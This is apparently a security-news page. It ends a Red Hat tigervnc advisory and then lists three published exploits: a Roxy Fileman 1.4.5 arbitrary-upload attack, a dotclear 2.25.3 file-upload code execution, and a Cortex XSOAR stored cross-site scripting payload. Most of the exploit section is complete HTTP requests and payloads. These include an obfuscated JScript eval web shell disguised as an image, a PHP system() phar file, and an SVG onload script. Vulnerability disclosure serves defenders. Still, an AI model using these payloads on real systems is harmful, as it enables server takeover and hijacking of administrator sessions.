tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1393  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDE1l9zjgjWX9erEAQj8Fg//diYgICEnqTMf1csN3bfDt+nKgiBXRzNO  
/8JZ8pkHelA+x35XpPrvABYiNfnqDd3GZqrKOhBpOME50LsOAy2FsoAu7YVZEpSe  
7NwDzA302hATDoHAcUqMi5FV+RyYb8/IY/MkcUHSK6WbjMB/DOQi9XxSeZYlIyau  
nOUts4A2gb6Bilm2c2lxGOKWbgDidjpTvmV5QPg+IZ5675kVRvjXdKpOOZ0HCsv+  
8IR0DdEmZK29611A/+DebXUYbIvzFJBCjkKiDsy634LxZ8DyaUiUmsxZxFTWZmJT  
xvxZiSM7PD1bEH+v1SZDk8GNIakqyJxd45S6/EPf3d0uOpFGio/7RJIv9HLU5PbG  
uDk9WJdKS7G0Pdy3AV71EY28JW00xe8LlFvIDOlYOYmVNImzylWZcfgn2Lrmrk30  
uFaWXx6chVsWD+j82b8isJsPR/+PAhrv9cGR0iNUoE928eLr84cNI1oCkgG0EvE/  
7DIYuorMOu0RL0emENBlWxjDney9vo7ZbzqcOSREGfBbugGjrYIvKe8OMUvS4fCz  
MKRmeg7jyqg7vlPg4EsrWRJ06F2EMcH/WMqdWoE+FOiZaibih9QY4GoyhOLo938l  
Ywg32HbPRgAMvNEt0gV58xIVfu5Edh249+61F+F4ADLt8VKwoZGhbUyaAQoqUlU9  
mZUEFPgIzvI=  
=ApGa  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1549-01

Roxy Fileman versions 1.4.5 and below for .NET suffer from a remote shell upload vulnerability.

    # Exploit Title: Roxy Fileman 1.4.5 For .NET Arbitrary File Upload# Date: 09/04/2023# Exploit Author: Zer0FauLT [admindeepsec@proton.me]# Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net# Version: <= 1.4.5# Tested on: Windows 10 and Windows Server 2019# CVE : 0DAY###########################################################################################                First, we upload the .jpg shell file to the server.                     ###########################################################################################POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 666Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="action"upload------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="method"ajax------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="d"/Upload/PenTest------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="files[]"; filename="test.jpg"Content-Type: image/jpegâ€°PNG<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>------WebKitFormBoundarygOxjsc2hpmwmISeJ--###########################################################################################   In the second stage, we manipulate the .jpg file that we uploaded to the server.     ###########################################################################################{"FILES_ROOT":          "","RETURN_URL_PREFIX":   "","SESSION_PATH_KEY":    "","THUMBS_VIEW_WIDTH":   "140","THUMBS_VIEW_HEIGHT":  "120","PREVIEW_THUMB_WIDTH": "300","PREVIEW_THUMB_HEIGHT":"200","MAX_IMAGE_WIDTH":     "1000","MAX_IMAGE_HEIGHT":    "1000","INTEGRATION":         "ckeditor","DIRLIST":             "asp_net/main.ashx?a=DIRLIST","CREATEDIR":           "asp_net/main.ashx?a=CREATEDIR","DELETEDIR":           "asp_net/main.ashx?a=DELETEDIR","MOVEDIR":             "asp_net/main.ashx?a=MOVEDIR","COPYDIR":             "asp_net/main.ashx?a=COPYDIR","RENAMEDIR":           "asp_net/main.ashx?a=RENAMEDIR","FILESLIST":           "asp_net/main.ashx?a=FILESLIST","UPLOAD":              "asp_net/main.ashx?a=UPLOAD","DOWNLOAD":            "asp_net/main.ashx?a=DOWNLOAD","DOWNLOADDIR":         "asp_net/main.ashx?a=DOWNLOADDIR","DELETEFILE":          "asp_net/main.ashx?a=DELETEFILE","MOVEFILE":            "asp_net/main.ashx?a=MOVEFILE","COPYFILE":            "asp_net/main.ashx?a=COPYFILE","RENAMEFILE":          "asp_net/main.ashx?a=RENAMEFILE","GENERATETHUMB":       "asp_net/main.ashx?a=GENERATETHUMB","DEFAULTVIEW":         "list","FORBIDDEN_UPLOADS":   "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess","ALLOWED_UPLOADS":     "bmp gif png jpg jpeg","FILEPERMISSIONS":     "0644","DIRPERMISSIONS":      "0755","LANG":                "auto","DATEFORMAT":          "dd/MM/yyyy HH:mm","OPEN_LAST_DIR":       "yes"}#############################################################################################################################################################################################################################   We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows.     #############################################################################################################################################################################################################################POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 44Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx===========================================================================================================================================================================================================================POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 68Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx###########################################################################################                                 and it's done!                                         ###########################################################################################HTTP/2 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Vary: Accept-EncodingServer: Microsoft-IIS/10.0X-Aspnet-Version: 4.0.30319X-Powered-By-Plesk: PleskWinDate: Sun, 09 Apr 2023 09:49:34 GMTContent-Length: 21{"res":"ok","msg":""}=============================================================================================

Roxy Fileman 1.4.5 Shell Upload

dotclear version 2.25.3 suffers from a remote shell upload vulnerability.

    Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)Application: dotclearVersion: 2.25.3Bugs:  Remote Code Execution (RCE) (Authenticated) via file uploadTechnology: PHPVendor URL: https://dotclear.org/Software Link: https://dotclear.org/downloadDate of found: 08.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================While writing a blog post, we know that we can upload images. But php did not allow file upload. This time<?php echo system("id"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it.We were able to run the php code when we visited your pagepoc request:POST /dotclear/admin/post.php HTTP/1.1Host: localhostContent-Length: 566Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1ccConnection: closepost_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=poc video : https://youtu.be/oIPyLqLJS70

dotclear 2.25.3 Shell Upload

Palo Alto Cortex XSOAR version 6.5.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)# Exploit Author: omurugur# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020# Version: 6.5.0 - 6.2.0 - 6.1.0# Tested on: [relevant os]# CVE : CVE-2022-0020# Author Web: https://www.justsecnow.com# Author Social: @omurugurrrA stored cross-site scripting (XSS) vulnerability in Palo Alto NetworkCortex XSOAR web interface enables an authenticated network-based attackerto store a persistent javascript payload that will perform arbitraryactions in the Cortex XSOAR web interface on behalf of authenticatedadministrators who encounter the payload during normal operations.POST /acc_UAB(MAY)/incidentfield HTTP/1.1Host: x.x.x.xCookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;isTimLicense=falseUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)Gecko/20100101 Firefox/94.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://x.x.x.x/acc_UAB(MAY)Content-Type: application/jsonX-Xsrf-Token:Api_truncate_results: trueOrigin: https://x.x.x.xContent-Length: 373Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Fieldedited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}Regards,Omur UGUR

Tag

#js